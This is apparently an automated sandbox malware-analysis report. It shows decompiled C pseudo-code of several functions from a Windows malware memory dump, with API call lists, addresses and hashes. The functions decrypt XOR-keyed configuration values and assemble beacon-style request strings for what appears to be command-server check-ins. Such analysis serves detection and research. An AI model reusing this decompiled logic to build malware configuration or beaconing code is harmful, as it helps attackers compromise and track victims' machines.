                                • API String ID: 3298025750-0
                                • Opcode ID: 17b396631311074812c194efe3087eee7b91f3390dde9877d06cac116063f9aa
                                • Instruction ID: 1de5731be523f4dcf2d67c687615f2fb477e6af109afed6b7e189663e25676fd
                                • Opcode Fuzzy Hash: 17b396631311074812c194efe3087eee7b91f3390dde9877d06cac116063f9aa
                                • Instruction Fuzzy Hash: DA318F71B00109BFDB15DBA4DD88E9A7BBCEB48704F140A67E604E7071E6B5BE04DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 04812206, Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E04812206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x481a2d0; // 0x63699bc3
				if(E04811BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x481a324 = _v8;
				}
				_t31 =  *0x481a2d0; // 0x63699bc3
				if(E04811BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x481a2d0; // 0x63699bc3
				if(E04811BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x481a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x481a2d0; // 0x63699bc3
						_t43 = E048138CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x481a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x481a2d0; // 0x63699bc3
						_t44 = E048138CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x481a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x481a2d0; // 0x63699bc3
						_t45 = E048138CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x481a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x481a2d0; // 0x63699bc3
						_t46 = E048138CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x481a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x481a2d0; // 0x63699bc3
						_t47 = E048138CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x481a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x481a2d0; // 0x63699bc3
						_t48 = E048138CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E04813E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E048150DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x481a2d0; // 0x63699bc3
						_t49 = E048138CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E04813E49(0, _t49) != 0) {
						_t102 =  *0x481a37c; // 0x68d9630
						E048110DD(_t102 + 4, _t54);
					}
					_t50 =  *0x481a2d4; // 0x20bd5a8
					_t20 = _t50 + 0x481b252; // 0x68d87fa
					_t21 = _t50 + 0x481b7b5; // 0x6976612e
					 *0x481a320 = _t20;
					 *0x481a390 = _t21;
					HeapFree( *0x481a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}





























                                0x04812206
                                0x04812209
                                0x04812229
                                0x04812237
                                0x04812237
                                0x0481223c
                                0x04812256
                                0x0481242a
                                0x04812431
                                0x04812438
                                0x04812438
                                0x0481225c
                                0x04812278
                                0x04812418
                                0x04812422
                                0x00000000
                                0x0481227e
                                0x0481227e
                                0x04812283
                                0x04812299
                                0x04812285
                                0x04812285
                                0x04812292
                                0x04812292
                                0x048122a3
                                0x048122a5
                                0x048122af
                                0x048122b4
                                0x048122b4
                                0x048122af
                                0x048122bb
                                0x048122d1
                                0x048122bd
                                0x048122bd
                                0x048122ca
                                0x048122ca
                                0x048122d5
                                0x048122d7
                                0x048122e1
                                0x048122e6
                                0x048122e6
                                0x048122e1
                                0x048122ed
                                0x04812303
                                0x048122ef
                                0x048122ef
                                0x048122fc
                                0x048122fc
                                0x04812307
                                0x04812309
                                0x04812313
                                0x04812318
                                0x04812318
                                0x04812313
                                0x0481231f
                                0x04812335
                                0x04812321
                                0x04812321
                                0x0481232e
                                0x0481232e
                                0x04812339
                                0x0481233b
                                0x04812345
                                0x0481234a
                                0x0481234a
                                0x04812345
                                0x04812351
                                0x04812367
                                0x04812353
                                0x04812353
                                0x04812360
                                0x04812360
                                0x0481236b
                                0x0481236d
                                0x04812377
                                0x0481237c
                                0x0481237c
                                0x04812377
                                0x04812383
                                0x04812399
                                0x04812385
                                0x04812385
                                0x04812392
                                0x04812392
                                0x0481239d
                                0x0481239f
                                0x048123a2
                                0x048123a3
                                0x048123aa
                                0x048123ac
                                0x048123ad
                                0x048123ad
                                0x048123aa
                                0x048123b4
                                0x048123ca
                                0x048123b6
                                0x048123b6
                                0x048123c3
                                0x048123c3
                                0x048123ce
                                0x048123dc
                                0x048123e6
                                0x048123e6
                                0x048123eb
                                0x048123f1
                                0x048123fe
                                0x04812404
                                0x0481240a
                                0x0481240f
                                0x04812415
                                0x00000000
                                0x04812415

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 048122AB
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 048122DD
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 0481230F
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 04812341
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 04812373
                                • HeapFree.KERNEL32(00000000,?,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 0481240F
                                • HeapFree.KERNEL32(00000000,?,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 04812422
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 13ccce4b1c2f508a0b0d3acd4022c9dcb0bbad9ea65a1a9cba9eedf7bb6bf7d4
                                • Instruction ID: 002dfbefcac1913812c784ff12c21534b9989a8c2b8d3442a6f4e447343510de
                                • Opcode Fuzzy Hash: 13ccce4b1c2f508a0b0d3acd4022c9dcb0bbad9ea65a1a9cba9eedf7bb6bf7d4
                                • Instruction Fuzzy Hash: F46171B1B00104ABD715EBBDD888C9F77ADEB48744B240E97A506F3170EA79FD409B21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04816EFC, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E04816EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x481a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x481a018; // 0x4934a3dd
					asm("bswap eax");
					_t32 =  *0x481a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x481a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x481a00c; // 0x69ab8210
					asm("bswap eax");
					_t35 =  *0x481a2d4; // 0x20bd5a8
					_t2 = _t35 + 0x481b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x481a02c,  *0x481a004, _t110);
					_t38 = E04816A09();
					_t39 =  *0x481a2d4; // 0x20bd5a8
					_t3 = _t39 + 0x481b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x481a2d4; // 0x20bd5a8
						_t7 = _t92 + 0x481b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E04815040(_t99);
					_t44 =  *0x481a2d4; // 0x20bd5a8
					_t9 = _t44 + 0x481b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x481a2d4; // 0x20bd5a8
					_t11 = _t48 + 0x481b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x481a32c; // 0x68d95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x481a2d4; // 0x20bd5a8
						_t13 = _t88 + 0x481b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x481a37c; // 0x68d9630
					_a28 = E04812885(0x481a00a, _t105 + 4);
					_t55 =  *0x481a31c; // 0x68d95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x481a2d4; // 0x20bd5a8
						_t16 = _t84 + 0x481b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x481a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x481a2d4; // 0x20bd5a8
						_t18 = _t81 + 0x481b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x481a290, _t107, 0x800);
						if(_t98 != _t107) {
							E04812DD0(GetTickCount());
							_t62 =  *0x481a37c; // 0x68d9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x481a37c; // 0x68d9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x481a37c; // 0x68d9630
							_t115 = E0481624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x48192ac);
								_push(_t115);
								_t108 = E048121C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E04811032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E04811492();
									}
									HeapFree( *0x481a290, 0, _v24);
								}
								HeapFree( *0x481a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x481a290, _t107, _t98);
						}
						HeapFree( *0x481a290, _t107, _a20);
					}
					HeapFree( *0x481a290, _t107, _t117);
				}
				return _v16;
			}





















































                                0x04816efc
                                0x04816f10
                                0x04816f12
                                0x04816f20
                                0x04816f24
                                0x04816f2c
                                0x04816f34
                                0x04816f34
                                0x04816f36
                                0x04816f42
                                0x04816f51
                                0x04816f56
                                0x04816f59
                                0x04816f5e
                                0x04816f61
                                0x04816f66
                                0x04816f69
                                0x04816f75
                                0x04816f82
                                0x04816f84
                                0x04816f8a
                                0x04816f8f
                                0x04816f9a
                                0x04816f9c
                                0x04816f9f
                                0x04816fa5
                                0x04816fa7
                                0x04816fb0
                                0x04816fbb
                                0x04816fbd
                                0x04816fc0
                                0x04816fc0
                                0x04816fc2
                                0x04816fc9
                                0x04816fce
                                0x04816fdb
                                0x04816fdd
                                0x04816fe2
                                0x04816ff0
                                0x04816ff2
                                0x04816ff7
                                0x04816ffc
                                0x04816fff
                                0x04817004
                                0x0481700f
                                0x04817011
                                0x04817014
                                0x04817014
                                0x04817016
                                0x04817029
                                0x0481702d
                                0x04817032
                                0x04817036
                                0x04817039
                                0x0481703e
                                0x04817049
                                0x0481704b
                                0x0481704e
                                0x0481704e
                                0x04817050
                                0x04817057
                                0x0481705a
                                0x0481705f
                                0x04817069
                                0x0481706b
                                0x04817072
                                0x0481708a
                                0x0481708e
                                0x0481709a
                                0x0481709f
                                0x048170a8
                                0x048170b9
                                0x048170bd
                                0x048170c6
                                0x048170cc
                                0x048170d9
                                0x048170e6
                                0x048170ec
                                0x048170f4
                                0x048170fa
                                0x04817100
                                0x04817104
                                0x04817108
                                0x0481710e
                                0x04817112
                                0x04817119
                                0x04817120
                                0x04817124
                                0x0481712f
                                0x04817136
                                0x0481713a
                                0x04817143
                                0x04817143
                                0x04817154
                                0x04817154
                                0x04817163
                                0x04817169
                                0x04817169
                                0x04817173
                                0x04817173
                                0x04817184
                                0x04817184
                                0x04817192
                                0x04817192
                                0x048171a2

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04816F1A
                                • GetTickCount.KERNEL32 ref: 04816F2E
                                • wsprintfA.USER32 ref: 04816F7D
                                • wsprintfA.USER32 ref: 04816F9A
                                • wsprintfA.USER32 ref: 04816FBB
                                • wsprintfA.USER32 ref: 04816FD9
                                • wsprintfA.USER32 ref: 04816FEE
                                • wsprintfA.USER32 ref: 0481700F
                                • wsprintfA.USER32 ref: 04817049
                                • wsprintfA.USER32 ref: 04817069
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04817084
                                • GetTickCount.KERNEL32 ref: 04817094
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 048170A8
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 048170C6
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816278
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816280
                                  • Part of subcall function 0481624D: strcpy.NTDLL ref: 04816297
                                  • Part of subcall function 0481624D: lstrcat.KERNEL32(00000000,00000000), ref: 048162A2
                                  • Part of subcall function 0481624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 048162BF
                                • StrTrimA.SHLWAPI(00000000,048192AC,00000000,068D9630), ref: 048170F4
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(068D87FA,00000000,00000000,00000000,04817100,00000000), ref: 048121D1
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(?), ref: 048121D9
                                  • Part of subcall function 048121C1: lstrcpy.KERNEL32(00000000,068D87FA), ref: 048121ED
                                  • Part of subcall function 048121C1: lstrcat.KERNEL32(00000000,?), ref: 048121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 04817112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04817120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04817124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04817154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04817163
                                • HeapFree.KERNEL32(00000000,00000000,00000000,068D9630), ref: 04817173
                                • HeapFree.KERNEL32(00000000,?), ref: 04817184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04817192
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 1837416118-0
                                • Opcode ID: 20ebb6ac996a8bb8d42aa17b5909e3222b3767bc1ead4f5e29eec6eea0e4b6d7
                                • Instruction ID: 0d734c75e4753acef4fb0c2d1c87d78754814759dd4a15f603c4e4dee3a6c3a6
                                • Opcode Fuzzy Hash: 20ebb6ac996a8bb8d42aa17b5909e3222b3767bc1ead4f5e29eec6eea0e4b6d7
                                • Instruction Fuzzy Hash: 46718EB2601205AFD325EBA8EC88E5677ECEB88710B050D17F949D3231E67EEC05DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048146D1, Relevance: 33.3, APIs: 22, Instructions: 262memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 77%
                                			E048146D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x481a018; // 0x4934a3dd
				asm("bswap eax");
				_t65 =  *0x481a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x481a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x481a00c; // 0x69ab8210
				asm("bswap eax");
				_t68 =  *0x481a2d4; // 0x20bd5a8
				_t3 = _t68 + 0x481b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x481a02c,  *0x481a004, _t63);
				_t71 = E04816A09();
				_t72 =  *0x481a2d4; // 0x20bd5a8
				_t4 = _t72 + 0x481b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x481a2d4; // 0x20bd5a8
					_t8 = _t139 + 0x481b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E04815040(_t144);
				_t77 =  *0x481a2d4; // 0x20bd5a8
				_t10 = _t77 + 0x481b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x481a2d4; // 0x20bd5a8
				_t12 = _t81 + 0x481b7aa; // 0x68d8d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x481b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x481a31c; // 0x68d95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x481a2d4; // 0x20bd5a8
					_t18 = _t135 + 0x481b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x481a32c; // 0x68d95b0
				if(_t86 != 0) {
					_t132 =  *0x481a2d4; // 0x20bd5a8
					_t20 = _t132 + 0x481b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x481a37c; // 0x68d9630
				_t88 = E04812885(0x481a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x481a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x481a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x481a290, _t167, _v12);
						goto L28;
					}
					E04812DD0(GetTickCount());
					_t95 =  *0x481a37c; // 0x68d9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x481a37c; // 0x68d9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x481a37c; // 0x68d9630
					_t163 = E0481624D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x481a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x48192ac);
					_push(_t163);
					_t107 = E048121C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x481a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E04814AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E04811492();
						L24:
						HeapFree( *0x481a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E048126C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E0481161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E048150CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0481580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E048150CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                0x048146d1
                                0x048146d1
                                0x048146d1
                                0x048146da
                                0x048146df
                                0x048146e6
                                0x048146e8
                                0x048146e8
                                0x048146f5
                                0x04814700
                                0x04814703
                                0x0481470e
                                0x04814711
                                0x04814716
                                0x04814719
                                0x0481471e
                                0x04814721
                                0x0481472d
                                0x0481473a
                                0x0481473c
                                0x04814742
                                0x04814747
                                0x04814752
                                0x04814754
                                0x04814757
                                0x0481475d
                                0x0481475f
                                0x04814767
                                0x04814772
                                0x04814774
                                0x04814777
                                0x04814777
                                0x04814779
                                0x04814780
                                0x04814785
                                0x04814792
                                0x04814794
                                0x04814799
                                0x048147a1
                                0x048147a4
                                0x048147aa
                                0x048147b5
                                0x048147b7
                                0x048147bc
                                0x048147c1
                                0x048147c4
                                0x048147c9
                                0x048147d4
                                0x048147d6
                                0x048147d9
                                0x048147d9
                                0x048147db
                                0x048147e2
                                0x048147e5
                                0x048147ea
                                0x048147f4
                                0x048147f6
                                0x048147f6
                                0x048147f9
                                0x04814807
                                0x0481480c
                                0x04814810
                                0x04814813
                                0x048149dd
                                0x048149e5
                                0x048149f2
                                0x04814819
                                0x04814825
                                0x0481482d
                                0x04814830
                                0x048149cd
                                0x048149d7
                                0x00000000
                                0x048149d7
                                0x0481483c
                                0x04814841
                                0x0481484a
                                0x0481485b
                                0x0481485f
                                0x04814868
                                0x0481486e
                                0x0481487b
                                0x04814882
                                0x0481488b
                                0x04814891
                                0x048149bd
                                0x048149c7
                                0x00000000
                                0x048149c7
                                0x0481489d
                                0x048148a3
                                0x048148a4
                                0x048148ab
                                0x048148ae
                                0x048149af
                                0x048149b7
                                0x00000000
                                0x048149b7
                                0x048148b7
                                0x048148bd
                                0x048148c6
                                0x048148cf
                                0x048148da
                                0x048148e1
                                0x048148e4
                                0x048149f5
                                0x04814997
                                0x04814997
                                0x0481499c
                                0x048149a7
                                0x048149ad
                                0x00000000
                                0x048149ad
                                0x048148ee
                                0x048148f5
                                0x048148f8
                                0x048148fd
                                0x0481490d
                                0x04814910
                                0x04814916
                                0x0481491c
                                0x04814922
                                0x04814925
                                0x0481492b
                                0x0481492e
                                0x04814933
                                0x04814937
                                0x04814937
                                0x04814943
                                0x0481494f
                                0x04814953
                                0x04814955
                                0x0481495a
                                0x0481495c
                                0x04814961
                                0x04814966
                                0x04814973
                                0x0481497b
                                0x0481497e
                                0x0481497e
                                0x0481495a
                                0x00000000
                                0x04814945
                                0x04814949
                                0x04814980
                                0x04814983
                                0x0481498c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0481498c
                                0x0481494b
                                0x00000000
                                0x0481494b
                                0x04814943

                                APIs
                                • GetTickCount.KERNEL32 ref: 048146E8
                                • wsprintfA.USER32 ref: 04814735
                                • wsprintfA.USER32 ref: 04814752
                                • wsprintfA.USER32 ref: 04814772
                                • wsprintfA.USER32 ref: 04814790
                                • wsprintfA.USER32 ref: 048147B3
                                • wsprintfA.USER32 ref: 048147D4
                                • wsprintfA.USER32 ref: 048147F4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04814825
                                • GetTickCount.KERNEL32 ref: 04814836
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 0481484A
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 04814868
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816278
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816280
                                  • Part of subcall function 0481624D: strcpy.NTDLL ref: 04816297
                                  • Part of subcall function 0481624D: lstrcat.KERNEL32(00000000,00000000), ref: 048162A2
